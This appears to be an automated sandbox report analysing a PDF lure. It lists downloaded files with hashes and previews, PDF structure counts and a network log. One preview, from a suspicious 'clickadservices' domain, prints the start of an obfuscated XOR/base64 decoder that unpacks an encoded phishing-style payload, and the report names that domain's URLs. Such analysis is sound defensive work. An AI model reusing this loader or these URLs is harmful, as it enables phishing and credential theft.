                                                                                                                                      Preview:"use strict";(function(){function bt(e,r,t,o,l,s,m){try{var b=e[s](m),h=b.value}catch(d){t(d);return}b.done?r(h):Promise.resolve(h).then(o,l)}function Et(e){return function(){var r=this,t=arguments;return new Promise(function(o,l){var s=e.apply(r,t);function m(h){bt(s,o,l,m,b,"next",h)}function b(h){bt(s,o,l,m,b,"throw",h)}m(void 0)})}}function M(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):M(e,r)}function Ie(e,r,t){return r in e?Object.defineProperty(e,r,{value:t,enumerable:!0,configurable:!0,writable:!0}):e[r]=t,e}function Ve(e){for(var r=1;r<arguments.length;r++){var t=arguments[r]!=null?arguments[r]:{},o=Object.keys(t);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(t).filter(function(l){return Object.getOwnPropertyDescriptor(t,l).enumerable}))),o.forEach(function(l){Ie(e,l,t[l])})}return e}function fr(e,r){var t=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertyS
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (1437), with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):38221
                                                                                                                                      Entropy (8bit):5.115226983536052
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:192:loogIexLQ5WKTCFBwCIZtJ8FtX2+UBRkfeWcrScuH9Ye3YdersR8Q5oqWjf7ogxp:2DKAaZtJs5odw7hx5P6mqjDggJkLLn
                                                                                                                                      MD5:FBE2FCF4596B299453C91B7231BA7427
                                                                                                                                      SHA1:743291EE60A551E043529AFDC9E3FBE72D70E776
                                                                                                                                      SHA-256:2DE22B4CDEDCBEB9CD5F63EA7A0DF8F77D0EF9086D200B052BFA9EE949DEED40
                                                                                                                                      SHA-512:15CA09CD5754927D77B2CC9B74356585C5A1DD934ECF25B613F47964236A739DA8BE389999DE1AEEE7BDF8FA12FCBB07EEFF49E0EA80BA87AC786606DE74774F
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/xynV5WTpq6pef30
                                                                                                                                      Preview:@font-face{font-family: 'gdsherpa';font-weight: 700;src: url('/web8/assets/fonts/GDSherpa-bold.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-bold.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 400;src: url('/web8/assets/fonts/GDSherpa-regular.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-regular.woff') format('woff');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 999;src: url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gdsherpa';font-weight: 1 900;src: url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2'),url('/web8/assets/fonts/GDSherpa-vf2.woff2') format('woff2-variations');unicode-range: U+0-10FFFF;font-display: swap;}@font-face{font-family: 'gd-sage';font-weight: 700;src: url('/web8/ass
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:SVG Scalable Vector Graphics image
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):2905
                                                                                                                                      Entropy (8bit):3.962263100945339
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:48:zcr2Vxfbf9lAi39AkJDTTHBhhqithUg4wnTSKprgAnxptzGe:gajfr9DfdhhbSkPptzv
                                                                                                                                      MD5:FE87496CC7A44412F7893A72099C120A
                                                                                                                                      SHA1:A0C1458C08A815DF63D3CB0406D60BE6607CA699
                                                                                                                                      SHA-256:55CE3B0CE5BC71339308107982CD7671F96014256DED0BE36DC8062E64C847F1
                                                                                                                                      SHA-512:E527C6CD2A3D79CA828A9126E8FF7009A540AA764082750D4FA8207C2B8439CA1FDC4459E935D708DC59DCFFE55FE45188EB5E266D1B745FCA7588501BC0117D
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:<svg xmlns="http://www.w3.org/2000/svg" width="48" height="48" viewBox="0 0 48 48"><title>assets</title><rect width="48" height="48" fill="none"/><path d="M30.422,29.092a3.493,3.493,0,0,1,1.324.261,3.381,3.381,0,0,1,1.132.749q.366.366.827.775t.949.854q.488.444.941.932a9.974,9.974,0,0,1,.819,1A4.951,4.951,0,0,1,37,34.736a3.133,3.133,0,0,1,.218,1.15,3.493,3.493,0,0,1-.261,1.324,3.381,3.381,0,0,1-.749,1.132q-.888.888-1.6,1.568a8.753,8.753,0,0,1-1.489,1.15,6.17,6.17,0,0,1-1.716.705A9.367,9.367,0,0,1,29.151,42a13.73,13.73,0,0,1-3.9-.592A21.891,21.891,0,0,1,21.26,39.77a27.749,27.749,0,0,1-3.885-2.491,34.863,34.863,0,0,1-3.6-3.153,34.6,34.6,0,0,1-3.127-3.606,27.717,27.717,0,0,1-2.456-3.876A22.2,22.2,0,0,1,6.584,22.69,13.485,13.485,0,0,1,6,18.866,9.453,9.453,0,0,1,6.235,16.6a6.2,6.2,0,0,1,.7-1.707,8.848,8.848,0,0,1,1.141-1.489q.679-.723,1.585-1.611a3.381,3.381,0,0,1,1.132-.749,3.493,3.493,0,0,1,1.324-.261,3.3,3.3,0,0,1,1.681.47,8.648,8.648,0,0,1,1.542,1.15,17.725,17.725,0,0,1,1.376,1.428q.645.
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 108 x 24, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):1400
                                                                                                                                      Entropy (8bit):7.808470583085035
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:24:rIcdIg4GFKiUqLRfqX5Cbg2tRSpGHM0RMrB6nzU9Jd28VVdYfWZG0rrZgqhpT:rHUZGRNEoSpGHMTrB6zUXdNVSi1b
                                                                                                                                      MD5:333EE830E5AB72C41DD9126A27B4D878
                                                                                                                                      SHA1:12D8D66EBB3076F3D6069E133C3212F97C8774E1
                                                                                                                                      SHA-256:8702292CBC365E9F0488143E2B309B85EFE09C61FD2E0A2E21C53735A309313C
                                                                                                                                      SHA-512:3413ED624241877C1D44FEE23FD37745CB214C12AE73FACFAFA07B47FA1CB9E5DAA3CB7F542564E04075FFE8BA744C962FBDD78F08A643A90C0EC1118C05BBF8
                                                                                                                                      Malicious:false
                                                                                                                                      Preview:.PNG........IHDR...l................?IDAThC.X.n.A..K.. ..H8.....7P..p...&......>..4.'.y.`$Z...$1..9..;...w.|...zvvv.............b..Y....B...Dq..&\....pe..r.X.P...3.n...M.j.....+..r}}.t:...fa.mmm5U........)dwww...j...q<<<<L.}ggg.......k.O.?....^.gE.6....B..%U..w#H...y....~......h.....Q.E;.....T...E.W..X=..{.;..+.. ..`.(:2...A.*.U.....Y....z..l.r.S..<K...x.E.... .....U.,.`.....<::............MSiE.2w.!z.T...PWl.).0...Z....Z.'~.5zP.o..-. ......q..x..w.....y......5|v..i...........@w.c...j..3....w,/.3.).....u.......b.}..R........ `.*.....`mH$.U..B.H1...jx..3..$k ...........Z......4....A.>..X.a/...0N.&?q..........F#w&o."L:...l.c...x.P...@e..&.&|Y...!.i....gac..1C.....I..t...e~q.&.6.2B.}.*V.p.B.."...'..M..s.s.....V%-.?8yC.?m......z...&]\.VN.s....j.`....kY.....64.Y..(_ea[.r...1B.......5....i.u.......aQ.+z.x.......<,~..a...z,.I.T.b.P.^.`...y.58..,|Q...u.-.._....m.1...|k.j.7.,x.....X....ez..a....X...\E.$..-...s.../.9L.9*.(9..U...x$#.C...Nm...p.....J...
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:ASCII text, with very long lines (65447)
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):89501
                                                                                                                                      Entropy (8bit):5.289893677458563
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:DjExXUqJnxDjoXEZxkMV4QYSt0zvDL6gP3h8cApwEIOzVTB/UjPazMdLiX4mQ1v9:DIh8GgP3hujzwbhd3XvSiDQ47GKn
                                                                                                                                      MD5:8FB8FEE4FCC3CC86FF6C724154C49C42
                                                                                                                                      SHA1:B82D238D4E31FDF618BAE8AC11A6C812C03DD0D4
                                                                                                                                      SHA-256:FF1523FB7389539C84C65ABA19260648793BB4F5E29329D2EE8804BC37A3FE6E
                                                                                                                                      SHA-512:F3DE1813A4160F9239F4781938645E1589B876759CD50B7936DBD849A35C38FFAED53F6A61DBDD8A1CF43CF4A28AA9FFFBFDDEEC9A3811A1BB4EE6DF58652B31
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://code.jquery.com/jquery-3.6.0.min.js
                                                                                                                                      Preview:/*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}funct
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (65209), with CRLF line terminators
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):67324
                                                                                                                                      Entropy (8bit):5.614992507757323
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:1536:5n69gS5/gON4ogaoGSXbdT8kX0EFan9WVcec7WxZ:56d/j4oDoRXba+69WVcec6xZ
                                                                                                                                      MD5:E0FE2D21DDF607706B646BC53FA99EBA
                                                                                                                                      SHA1:89F6106888EEA50DFE9B50D53BD9DD340C088D36
                                                                                                                                      SHA-256:37D545D253C476ED5AB991DCBBA76603ABC60E37D0D0BC457ACCC3FFAF7D3AA2
                                                                                                                                      SHA-512:16BF8D440067B494215D7242E013B9A3E067E36BADDC7003C49934D0469BE74CB5F87056A53B728C8192B75F0F6590BC17B148EAC2EFA761131D691DE000D4B8
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/bpjiozdwnoemutrqztovpdwymxcWJZMCHPDMTJRGPSQWUVAXVQYTCRCEYHUKZATIKRJJLFXXXIMUHIRXS?2781104361947147400jsZikTMFTKAPXDFGAXBPRMSOCJOCGFLNDVJPVQ
                                                                                                                                      Preview:<script>..function kWSOSIVVTr(kVVAShldVf, ZlTNfjmIrd) {..let VhGcVuEHdW = '';..kVVAShldVf = atob(kVVAShldVf);..let SNLiLFloFy = ZlTNfjmIrd.length;..for (let i = 0; i < kVVAShldVf.length; i++) {.. VhGcVuEHdW += String.fromCharCode(kVVAShldVf.charCodeAt(i) ^ ZlTNfjmIrd.charCodeAt(i % SNLiLFloFy));..}..return VhGcVuEHdW;..}..var guCRkBaMQO = kWSOSIVVTr(`flR9LTIGMAB8UCoBVA5PX2NsUQQvGRkOEDwObRsVLFcHb3tuATVYFHx4M0JRcklsShMwHEkWUSEbMwRSKgFNEgJoRn9aHyYQFwgAJwwiQF4hGlRNGyMcNUsJb0YXVF9iRz1QHmwfSkBPbkYjWgIrBU1cfFhJcBlQfgZaEBgiHXBKAiFIGwoFJhkjA19tFl0MXyEGM1IVNltQDV5mR2YXQG0GVgEaNx1+UB9sGFAMXzgacgdMbQZaEBgiHW40emJVGUJNIQoiUAA2VUoQEm9LOE0EMgYDTV4lHicXFy0aXg4UfAo/VF8wEFoDASYKOFhfIwVQTBshS24FXzEWSwsBJlddM1BiVRleHTsHOxkCJxkEQAImEDxcAyoQXBZTcgEiXBZ/VxZXRxMNH2A7Dzh1BR4YESlrHAECTFNJa1hlG05PfxlCUXJVPFAeKVVLBx1vSyNNCS4QSgoUNx1yGRgwEF9fU30RKVcmdyJtEgBkGTVfQ3JXB297cklwGUwuHFcJUSAMPARSMgdcDh4zDXIZGDAQX19TIBoUWDYEPVUjKxE/O1UxFxJMKgQrEyZbAQk/VRcHYVhyGRExSBsEHjwdchkEOwVcX1M0Bj5NXzUaXwRDcEkzSx8xBlYQGDUAPgRSIxtW
                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                      File Type:PNG image data, 2160 x 443, 8-bit/color RGBA, non-interlaced
                                                                                                                                      Category:downloaded
                                                                                                                                      Size (bytes):49602
                                                                                                                                      Entropy (8bit):7.881935507115631
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:768:eKE36up1D3cLJg7zmjprNBQqJCoklwCeFrpKZ00PIwoftXEsQsV1kZ8IHml446Xe:KqupJ9+aqyqCz+0ALcmDIHnjL2p
                                                                                                                                      MD5:DB783743CD246FF4D77F4A3694285989
                                                                                                                                      SHA1:B9466716904457641B7831868B47162D8D378D41
                                                                                                                                      SHA-256:5913B1EC0FC58AB2BEC576804B9E9B566A584EA3D21A1BF74A7B40051A447FDC
                                                                                                                                      SHA-512:E6F36C52996B6BF8B07C7A102DEF2D555A1D35FA12F1A2016EDD8F3C86C33DD3545513B436AB6B4EF1D1CAD8A5CA5D352BA587EEE605638640B258C3976D9033
                                                                                                                                      Malicious:false
                                                                                                                                      URL:https://0n18pyx-clickadservices-rebooot0fa.foeclec.com/ijFTkgLR5Efre1T29FYi4mZsJ0xy5FLOyx1t1pBM6XxEeSqEaWM6gGZRb12210
                                                                                                                                      Preview:.PNG........IHDR...p..........{......sBIT....|.d.....pHYs..;...;...3.+....tEXtSoftware.www.inkscape.org..<... .IDATx...w.]U....L.I(!.B..J..R....PD.z-.(...4Q..*MQ. .(..EE.AP:.....HI.... ....ur3..r.Y.|....z..3.2.g..{..Y.V..6.u...U...Q.Z.X......m..........^......O.^l......Y.)`|...:......x.:."0r...H.W.....,.......j.....L%]s../4.>.<.........S.$I.$I.$I.T....*.(`s`S`.`C`mR..J...6.x.x.x..z9.......g..j}R...h.1.t]=....n..#.f.I.$I.$I.$I%c.G.. 5il.l.lCj.(S.F;.....7...AZ.@*B....%.E....C.be3..K....S."CI.$I.$I.$I...jV.v.v.v$5l..M.ysI......x{/i...Y...o..m.......v.6.>R..$I.$I.$I.......F.{..6v!...1{.Y..9ng...S..TF.I..;.o&5A.....&.w....$5J..M$I.$I.$I.$.........Q;..IQ...9n.nl.Z.e.......j.`hd..{..=p-p=n."I.$I.$I.$eg.G...........8...i......b. [.{.V.........V...96GI.$I.$I.$IY...c ..R...Q.q..,..........Gm........X=6NW......clp.I.$I.$I.$IZ*..g...s...c...F.A.<z*.Q.a...+.?....8.Xn.GO.$I.$I.$I..,O.l....@.....z.....R..a$.:...I.yb-....l....$I.$I.$I.$.....$.'S..j.p..3NBGX..M.3.?.......p$I.$
                                                                                                                                      File type:PDF document, version 1.7, 1 pages
                                                                                                                                      Entropy (8bit):7.969539967609829
                                                                                                                                      TrID:
                                                                                                                                      • Adobe Portable Document Format (5005/1) 100.00%
                                                                                                                                      File name:Saint Charles Borromeo Seminary-Wprckny.pdf
                                                                                                                                      File size:80'645 bytes
                                                                                                                                      MD5:5ff74700afdda8dca2777fd2b5145bf4
                                                                                                                                      SHA1:24f89069556b235b0f115daa87641574ee3cb202
                                                                                                                                      SHA256:f1d9aab353dc712b63e65a63a155ea3e2e03df38085b141c85275153bf31a513
                                                                                                                                      SHA512:d649e236a0edafdc84438ad270a33ddc098d3408370db94e1d68a714e6d13a0ae3eff968f867278f3654f8e2440f7fb182a87748e0ccd1f9fdb968f456faee70
                                                                                                                                      SSDEEP:1536:wk1QF7bh97wldJuy70MepB3v3xCXAUgFVZWzAeA9N:SjsQu4HxSgFVQADL
                                                                                                                                      TLSH:E5730194CC99748DE1A1D6029576726D076C7332B2C4E8185E3D891AC2F0ED2EB37E6B
                                                                                                                                      File Content Preview:%PDF-1.7.%......1 0 obj.<</Producer(-)/Title null/Author null/Subject null/Keywords null/Creator null/CreationDate null/ModDate null/Trapped null>>.endobj..2 0 obj.<</Type/Catalog/Pages 3 0 R/Lang(en-US)/Metadata 4 0 R>>.endobj..3 0 obj.<</Type/Pages/Coun
                                                                                                                                      Icon Hash:62cc8caeb29e8ae0

                                                                                                                                      General

                                                                                                                                      Header:%PDF-1.7
                                                                                                                                      Total Entropy:7.969540
                                                                                                                                      Total Bytes:80645
                                                                                                                                      Stream Entropy:7.996028
                                                                                                                                      Stream Bytes:75883
                                                                                                                                      Entropy outside Streams:4.946009
                                                                                                                                      Bytes outside Streams:4762
                                                                                                                                      Number of EOF found:1
                                                                                                                                      Bytes after EOF:
                                                                                                                                      NameCount
                                                                                                                                      obj33
                                                                                                                                      endobj33
                                                                                                                                      stream6
                                                                                                                                      endstream6
                                                                                                                                      xref1
                                                                                                                                      trailer1
                                                                                                                                      startxref1
                                                                                                                                      /Page1
                                                                                                                                      /Encrypt0
                                                                                                                                      /ObjStm0
                                                                                                                                      /URI2
                                                                                                                                      /JS0
                                                                                                                                      /JavaScript0
                                                                                                                                      /AA0
                                                                                                                                      /OpenAction0
                                                                                                                                      /AcroForm0
                                                                                                                                      /JBIG2Decode0
                                                                                                                                      /RichMedia0
                                                                                                                                      /Launch0
                                                                                                                                      /EmbeddedFile0
                                                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                                                      May 8, 2024 20:11:57.899517059 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      May 8, 2024 20:11:58.202533007 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      May 8, 2024 20:11:58.806237936 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      May 8, 2024 20:12:00.013202906 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      May 8, 2024 20:12:02.426269054 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      May 8, 2024 20:12:04.603351116 CEST49711443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:04.603393078 CEST44349711104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:04.603527069 CEST49711443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:04.612683058 CEST49711443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:04.612714052 CEST44349711104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:04.953061104 CEST44349711104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:04.953149080 CEST49711443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:04.955931902 CEST49711443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:04.955955029 CEST44349711104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:04.956417084 CEST44349711104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:04.997208118 CEST49711443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.002485037 CEST49711443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.044126987 CEST44349711104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.277178049 CEST44349711104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.277251005 CEST44349711104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.277321100 CEST49711443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.277410984 CEST49711443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.277427912 CEST44349711104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.277441025 CEST49711443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.277446032 CEST44349711104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.332596064 CEST49712443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.332636118 CEST44349712104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.332710981 CEST49712443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.333034992 CEST49712443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.333045959 CEST44349712104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.662821054 CEST44349712104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.663007021 CEST49712443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.664427042 CEST49712443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.664450884 CEST44349712104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.664705992 CEST44349712104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.666405916 CEST49712443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.708132029 CEST44349712104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.993894100 CEST44349712104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.993968964 CEST44349712104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.994029045 CEST49712443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.994987965 CEST49712443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.995009899 CEST44349712104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:05.995023012 CEST49712443192.168.2.16104.125.88.106
                                                                                                                                      May 8, 2024 20:12:05.995028973 CEST44349712104.125.88.106192.168.2.16
                                                                                                                                      May 8, 2024 20:12:06.067656040 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      May 8, 2024 20:12:06.369245052 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      May 8, 2024 20:12:06.976247072 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      May 8, 2024 20:12:07.230268002 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      May 8, 2024 20:12:07.626384020 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:07.626437902 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:07.626629114 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:07.627652884 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:07.627667904 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:08.187280893 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      May 8, 2024 20:12:08.541925907 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:08.542038918 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:08.544961929 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:08.544972897 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:08.545232058 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:08.597259998 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:08.607043982 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:08.652116060 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.436073065 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.436098099 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.436115026 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.436141968 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.436162949 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.436172009 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.436178923 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:09.436202049 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.436223984 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.436232090 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.436253071 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:09.436259985 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.436296940 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:09.436311960 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.436322927 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:09.436357021 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:09.460700035 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:09.460725069 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:09.460737944 CEST49713443192.168.2.1640.127.169.103
                                                                                                                                      May 8, 2024 20:12:09.460743904 CEST4434971340.127.169.103192.168.2.16
                                                                                                                                      May 8, 2024 20:12:10.539647102 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                      May 8, 2024 20:12:10.602271080 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      May 8, 2024 20:12:10.842240095 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                      May 8, 2024 20:12:11.450303078 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                      May 8, 2024 20:12:12.662250996 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                      May 8, 2024 20:12:15.075242043 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                      May 8, 2024 20:12:15.411266088 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      May 8, 2024 20:12:16.833281040 CEST49673443192.168.2.16204.79.197.203
                                                                                                                                      May 8, 2024 20:12:19.884288073 CEST4968080192.168.2.16192.229.211.108
                                                                                                                                      May 8, 2024 20:12:25.011375904 CEST49678443192.168.2.1620.189.173.10
                                                                                                                                      May 8, 2024 20:12:26.065948009 CEST49714443192.168.2.16173.222.196.143
                                                                                                                                      May 8, 2024 20:12:26.065994024 CEST44349714173.222.196.143192.168.2.16
                                                                                                                                      May 8, 2024 20:12:26.066066980 CEST49714443192.168.2.16173.222.196.143
                                                                                                                                      May 8, 2024 20:12:26.066284895 CEST49714443192.168.2.16173.222.196.143
                                                                                                                                      May 8, 2024 20:12:26.066303968 CEST44349714173.222.196.143192.168.2.16
                                                                                                                                      May 8, 2024 20:12:26.562104940 CEST44349714173.222.196.143192.168.2.16
                                                                                                                                      May 8, 2024 20:12:26.562463045 CEST49714443192.168.2.16173.222.196.143
                                                                                                                                      May 8, 2024 20:12:26.562494040 CEST44349714173.222.196.143192.168.2.16
                                                                                                                                      May 8, 2024 20:12:26.563617945 CEST44349714173.222.196.143192.168.2.16
                                                                                                                                      May 8, 2024 20:12:26.563694954 CEST49714443192.168.2.16173.222.196.143
                                                                                                                                      May 8, 2024 20:12:26.566401958 CEST49714443192.168.2.16173.222.196.143
                                                                                                                                      May 8, 2024 20:12:26.566471100 CEST44349714173.222.196.143192.168.2.16
                                                                                                                                      May 8, 2024 20:12:26.566745996 CEST49714443192.168.2.16173.222.196.143
                                                                                                                                      May 8, 2024 20:12:26.566755056 CEST44349714173.222.196.143192.168.2.16
                                                                                                                                      May 8, 2024 20:12:26.619249105 CEST49714443192.168.2.16173.222.196.143
                                                                                                                                      May 8, 2024 20:12:26.748065948 CEST44349714173.222.196.143192.168.2.16
                                                                                                                                      May 8, 2024 20:12:26.748172998 CEST44349714173.222.196.143192.168.2.16
                                                                                                                                      May 8, 2024 20:12:26.748248100 CEST49714443192.168.2.16173.222.196.143
                                                                                                                                      May 8, 2024 20:12:26.749708891 CEST49714443192.168.2.16173.222.196.143
                                                                                                                                      May 8, 2024 20:12:26.749732971 CEST44349714173.222.196.143192.168.2.16
                                                                                                                                      May 8, 2024 20:12:29.270159960 CEST49716443192.168.2.16142.251.33.70
                                                                                                                                      May 8, 2024 20:12:29.270205975 CEST44349716142.251.33.70192.168.2.16
                                                                                                                                      May 8, 2024 20:12:29.270266056 CEST49716443192.168.2.16142.251.33.70
                                                                                                                                      May 8, 2024 20:12:29.270498037 CEST49716443192.168.2.16142.251.33.70
                                                                                                                                      May 8, 2024 20:12:29.270509958 CEST44349716142.251.33.70192.168.2.16
                                                                                                                                      May 8, 2024 20:12:29.270930052 CEST49717443192.168.2.16142.251.33.70
                                                                                                                                      May 8, 2024 20:12:29.270962954 CEST44349717142.251.33.70192.168.2.16
                                                                                                                                      May 8, 2024 20:12:29.271064043 CEST49717443192.168.2.16142.251.33.70
                                                                                                                                      May 8, 2024 20:12:29.271246910 CEST49717443192.168.2.16142.251.33.70
                                                                                                                                      May 8, 2024 20:12:29.271259069 CEST44349717142.251.33.70192.168.2.16
